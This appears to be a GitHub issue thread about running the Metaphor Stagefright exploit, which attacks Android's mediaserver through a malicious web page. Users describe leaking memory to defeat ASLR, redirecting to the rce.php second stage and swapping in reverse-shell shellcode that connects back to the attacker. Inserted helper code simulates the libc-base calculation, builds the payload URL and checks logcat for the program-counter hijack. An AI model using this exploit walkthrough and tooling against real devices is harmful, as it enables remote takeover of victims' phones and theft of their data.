
Exploit Output #6

Open
TirelessMan opened this issue Apr 27, 2016 · 10 comments

Comments

@TirelessMan

Hi,
I am going to use your Metaphor implementation code. I have run a web server and connected to it from my Nexus 5 using Chrome. I have many mp4 files in the leak folder, and in the rce folder I have 2 mp4 files in each run.
In my terminal I check the mediaserver process ID and I see that it has crashed.
But I cannot see anything about the exploit output. In short, I don't know what and where the exploit output is! I have read your paper many times.
If at the end some data will be leaked from the victim device, where will this data be saved? And how can I check that this data is really from the victim device?
Thanks in advance.

@rootkitor

You need to read carefully enough to understand the whole exploit, then you'll find out how the leaked libc.so base address is being used.

@TirelessMan
Author

Thanks rootkitor, I don't know what the output of the exploit is yet! I know the exploit process and flow chart, but I do not understand how much data I will get from the victim's memory at the end, and where this leaked data will be saved.

@rootkitor

rootkitor commented May 2, 2016

Hi, we can leak 8 bytes (with some limits) from the mediaserver's memory by overwriting the MetaData object. Researchers from NorthBit chose to leak two values from the ELF header to locate a library in memory. Due to the Android ASLR slide, we can calculate the libc.so address. It's very smart because there are many restrictions they had to bypass. Once you have the libc.so base address, you can generate and deliver the final RCE mp4 file. This exploit uses the leaked data immediately and will not save it, because the base address changes every time mediaserver restarts.
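The leak-then-compute flow described in the comment above, as an added example that is not part of the Metaphor project or of this thread. It simulates an 8-byte read primitive over a constructed address space, walks page by page down from a leaked pointer until it finds a page starting with an ELF header (magic plus the 32-bit class byte, two values from one 8-byte leak), and then derives a libc.so base. The library base, the leaked pointer, the libc distance constant and the web root are all assumed demo values; the assumption that a fixed, build-specific distance separates the located library from libc.so (the ASLR slide moving them together) is the example's, not a fact taken from the page.

```python
PAGE = 0x1000
ELF_MAGIC = b"\x7fELF"
ELFCLASS32 = 1          # e_ident[EI_CLASS] of a 32-bit ELF (ARM mediaserver)


class LeakedMemory:
    """Constructed stand-in for the mediaserver address space.
    mappings: {page-aligned base: bytes}. Every other address is unmapped."""

    def __init__(self, mappings):
        self.mappings = dict(mappings)
        self.reads = 0

    def read8(self, addr):
        """The leak primitive: the 8 bytes at addr, or None when addr is
        unmapped (on the real target that read crashes mediaserver instead)."""
        self.reads += 1
        for base, data in self.mappings.items():
            if base <= addr and addr + 8 <= base + len(data):
                return data[addr - base:addr - base + 8]
        return None


def looks_like_elf_header(leak8):
    """Two checks from a single 8-byte leak: ELF magic and 32-bit class byte."""
    return (leak8 is not None
            and leak8[:4] == ELF_MAGIC
            and leak8[4] == ELFCLASS32)


def find_library_base(mem, leaked_ptr, max_pages=64):
    """Walk downward, one page at a time, from a pointer known to lie inside a
    mapped library until a page begins with an ELF header. max_pages bounds the
    walk: every read of an unmapped page is a mediaserver crash on a real device,
    so a bad pointer must stop the search rather than keep probing."""
    page = leaked_ptr & ~(PAGE - 1)
    for _ in range(max_pages):
        leak = mem.read8(page)
        if leak is None:
            return None          # walked off the mapping: would have crashed
        if looks_like_elf_header(leak):
            return page
        page -= PAGE
    return None


def libc_base_from(library_base, libc_delta):
    """ASSUMPTION of this demo: the distance between the located library and
    libc.so is a constant for a given firmware build (ASLR slides them together),
    so one measured constant turns the found base into the libc.so base."""
    return library_base + libc_delta


def rce_url(web_root, libc_base):
    """The thread shows the second stage requested as rce.php?addr=<8 hex digits>."""
    return "%s/rce.php?addr=%08x" % (web_root, libc_base)


# Constructed layout: one 4-page library at 0xb6e80000 whose first page holds a
# minimal ELF header; nothing else is mapped. Not real Nexus 5 addresses.
FAKE_LIB_BASE = 0xb6e80000
FAKE_LIB = (ELF_MAGIC + bytes([ELFCLASS32, 1, 1, 0])).ljust(4 * PAGE, b"\x00")
FAKE_LIBC_DELTA = 0x41000        # assumed, device-specific in reality


def demo():
    """Leak -> locate library -> compute libc base -> build the RCE request."""
    mem = LeakedMemory({FAKE_LIB_BASE: FAKE_LIB})
    leaked_ptr = FAKE_LIB_BASE + 0x3ac4   # pretend this came from the MetaData leak
    lib_base = find_library_base(mem, leaked_ptr)
    if lib_base is None:
        return None
    libc_base = libc_base_from(lib_base, FAKE_LIBC_DELTA)
    return lib_base, libc_base, rce_url("http://192.0.2.10/web", libc_base)


if __name__ == "__main__":
    print(demo())
```

Nothing here is written to disk, which mirrors the point of the comment: the computed base is consumed right away to build the rce.php request, and it is worthless after the next mediaserver restart. The `max_pages` bound and the `None` return on an unmapped read are the failure mode a practitioner has to handle, since each wrong probe on a real device costs a crash and a restart with a fresh slide.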

@TirelessMan
Author

TirelessMan commented May 10, 2016

Hi rootkitor, I read the document again and ran Metaphor on my Nexus 5 device; now I see at the end that the PC (program counter) is set to 3700!
I changed the shellcode content to 3800, for example, and this set PC to 3800 hopefully.
I think this is all of the privilege escalation of the NorthBit researchers in the Metaphor project.
If so, I want to execute my own shellcode instead of NorthBit's embedded shellcode. For example, I want to open a port on the device or run an impressive command.
Did you test your own shellcode in the Metaphor project, rootkitor? And how can I use my own shellcode? Thanks in advance.

@rootkitor

You can replace the shellcode with your own by editing rce.php.

@secmart

secmart commented May 18, 2016

Hi, I also have a problem with the shellcode.
I replaced your shellcode with this one: http://shell-storm.org/shellcode/files/shellcode-754.php
When I compile it, copy it to the phone (Nexus 5 with LRX22C), make it executable and run it, I get a connection back to my PC.
But when I try to import it into the exploit by changing rce.php, I only get the two mp4 files in the rce folder, and I don't get a connection back to my PC.
In the rce file I changed the shellcode path and removed the three parameters (-1 -2 -3) at the end, because all the connection info is already in the shellcode.
What did I do wrong?
Where can I look to find the problem?
Thanks in advance.

@Enilos

Enilos commented Jul 29, 2016

Hi,

I tried to use Metaphor. I use a XAMPP server.
Mediaserver crashed:

Once my device is connected to the attack page (/web/index.php), I displayed the pid of mediaserver via adb shell, and it has changed.

I have created the rce and leaks folders with the correct permissions, and the leak videos and the 2 rce videos are generated. However, it seems bx_0x3700.bin has no effect.

A redirection from "[...]/web/index.php" to "[...]/web/rce.php?addr=b6ef7000" occurred, and an empty video appears.

Could you explain to me how I can see the PC (program counter), please?
Do you have an idea of where my problem comes from? Did I miss a step?

Thank you in advance for your response.

@TirelessMan
Author

Hi SolineBlanc, you can use the adb logcat command to see your device's logcat. In the log content you can see your PC is changed to 0x3700.
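A way to pull the program counter out of the crash dump that logcat shows after mediaserver dies, as an added example that is not part of this thread or of the Metaphor project. The logcat excerpt below is constructed in the usual 32-bit ARM debuggerd layout (a `pid:`/`>>> process <<<` line, a `signal` line, then register lines); the pids, thread name and register values are made up, and the exact format on a given Android build may differ. The parser returns the crashing process and its pc so a script can check that the hijack landed at the expected address rather than eyeballing the log.

```python
import re

# Constructed logcat excerpt (not captured from any device in this thread).
SAMPLE_LOGCAT = """\
F/libc    ( 1234): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x3700 in tid 1290 (Binder_3)
I/DEBUG   (  198): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   (  198): pid: 1234, tid: 1290, name: Binder_3  >>> /system/bin/mediaserver <<<
I/DEBUG   (  198): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00003700
I/DEBUG   (  198):     r0 00000000  r1 b6ef7000  r2 00000001  r3 00000000
I/DEBUG   (  198):     ip b6f1d0c0  sp b58fd1d8  lr b6ee5a4f  pc 00003700  cpsr 200f0010
"""

PROC_RE = re.compile(r"pid: (\d+), tid: (\d+), name: (\S+)\s+>>> (\S+) <<<")
SIG_RE = re.compile(
    r"signal (\d+) \((\w+)\), code (\d+) \((\w+)\), fault addr ([0-9a-f]{8})")
PC_RE = re.compile(r"\bpc ([0-9a-f]{8})\b")


def parse_crash(logcat_text):
    """Return the last native crash in logcat_text as a dict, or None.
    Fields: pid, tid, thread, process, and (when present) signal, signame,
    fault_addr and pc as integers."""
    crash = None
    for line in logcat_text.splitlines():
        m = PROC_RE.search(line)
        if m:
            crash = {"pid": int(m.group(1)), "tid": int(m.group(2)),
                     "thread": m.group(3), "process": m.group(4)}
            continue
        if crash is None:
            continue            # register lines before a pid line are noise
        m = SIG_RE.search(line)
        if m:
            crash["signal"] = int(m.group(1))
            crash["signame"] = m.group(2)
            crash["fault_addr"] = int(m.group(5), 16)
            continue
        m = PC_RE.search(line)
        if m:
            crash["pc"] = int(m.group(1), 16)
    return crash


def mediaserver_pc_hit(logcat_text, expected_pc=0x3700):
    """True only when the crashing process is mediaserver and pc is exactly
    expected_pc, i.e. control flow was redirected where the exploit aims."""
    crash = parse_crash(logcat_text)
    return (crash is not None
            and crash.get("process", "").endswith("/mediaserver")
            and crash.get("pc") == expected_pc)


def grep(logcat_text, needle):
    """Equivalent of `adb logcat | grep needle`: the matching lines."""
    return [ln for ln in logcat_text.splitlines() if needle in ln]


if __name__ == "__main__":
    print(parse_crash(SAMPLE_LOGCAT))
    print("pc hit:", mediaserver_pc_hit(SAMPLE_LOGCAT))
```

One detail worth checking when a grep comes back empty: in this layout the register dump prints values as zero-padded hex without a `0x` prefix, so `grep 0x3700` only matches libc's `Fatal signal` line, while the register line reads `pc 00003700`. Checking the `>>> ... <<<` process name also matters, because tombstones from any other crashing process look identical.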

@Enilos

Enilos commented Aug 3, 2016

Thank you very much :D

It does not work yet (adb logcat | grep 0x3700 does not return anything), but this command line will be useful to find out why. I hope to come back soon, with more questions or an answer ;)

Thank you again !

@nermin-yehia

nermin-yehia commented Aug 20, 2016

Hi All,
I tried to run Metaphor on a Nexus 5 device. After the redirect to rce.php I got this error in logcat; what does that mean?

08-20 16:41:17.682 31502-31854/? I/NuCachedSource2: ERROR_END_OF_STREAM
08-20 16:41:17.688 31502-31539/? E/StagefrightMetadataRetriever: Unable to instantiate an extractor for 'http://192.168.1.13/metaphor_original/web/rce.php?addr=b6ed6000'.
08-20 16:41:17.699 29230-29339/? E/MediaResourceGetter: Error configuring data source
java.lang.RuntimeException: setDataSource failed: status = 0x80000000
at android.media.MediaMetadataRetriever._setDataSource(Native Method)
at android.media.MediaMetadataRetriever.setDataSource(MediaMetadataRetriever.java:105)
at org.chromium.content.browser.MediaResourceGetter.configure(MediaResourceGetter.java:412)
at org.chromium.content.browser.MediaResourceGetter.configure(MediaResourceGetter.java:254)
at org.chromium.content.browser.MediaResourceGetter.extract(MediaResourceGetter.java:148)
at org.chromium.content.browser.MediaResourceGetter.extractMediaMetadata(MediaResourceGetter.java:120)
08-20 16:41:17.700 29230-29339/? E/MediaResourceGetter: Unable to configure metadata extractor

I also couldn't get the pc from logcat.

Thanks
